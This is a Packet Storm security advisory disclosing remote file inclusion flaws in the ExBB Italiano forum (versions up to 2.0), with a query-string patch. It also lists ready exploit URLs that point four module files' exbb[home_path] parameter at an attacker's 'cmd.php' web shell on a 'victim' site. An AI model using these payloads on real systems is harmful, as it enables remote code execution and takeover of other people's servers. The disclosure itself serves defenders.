ExBB Italiano versions 2.0 and below suffer from remote file inclusion vulnerabilities via home_path. Patch included.
5c50e453262ed60d076da1668ae5bfc8ec93dd106d274b41c72b2dab743c5147#
# ExBB Italiano <= 2.0 exbb[home_path] Multiple Remote File Inclusion Exploit
#
#
# General Info:
#
# - Critical Level: Dangerous
# - Version affected: <= 2.0
# - Vendors: exbb.clans.it
#
# Bugged files:
#
# - modules/threadstop/threadstop.php
# - modules/userstop/userstop.php (*)
# - modules/birstday/birst.php
# - modules/newusergreatings/pm_newreg.php
#
# Universal patch to put after starting php brace of every file
#
# if ((stristr($_SERVER['QUERY_STRING'], 'exbb[home_path]'))
# or (stristr($_SERVER['QUERY_STRING'], "exbb['home_path']"))) {
# die("<center><font face=\"Verdana\" size=\"1\">Patched! Thanks to
# <a href=\"mailto:lord.flippo@gmail.com\">Flippo</a>.</font></center>
# ");
# }
#
#
# Exploits
#
# - http://{localhost}/{forum}/modules/threadstop/threadstop.php?new_exbb[home_path]={php_cmd_path}
# - http://{localhost}/{forum}/modules/userstop/userstop.php?exbb[home_path]={php_cmd_path} (*)
# - http://{localhost}/{forum}/modules/newusergreatings/pm_newreg.php?exbb[home_path]={php_cmd_path}
# - http://{localhost}/{forum}/modules/birstday/birst.php?exbb[home_path]={php_cmd_path}
#
# - {localhost} : your victim
# - {forum} : path of ExBB's installation
# - {php_cmd_path} : your cmd.php :P
#
#
# Discovered by Flippo - lord.flippo[at]gmail[dot]com
#
#
# Greetings to:
#
# * all ExBB Italiano Community particulary to SamyWeb
# * #baslug particulary to zeno
# * #hacker.it
# * #sockets particulary to hz
# * and all the others
#
#
# (*) This bug (& so exploit too) was already found by SHiKaA - SHiKaA-[at]hotmail[dot]com
#
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed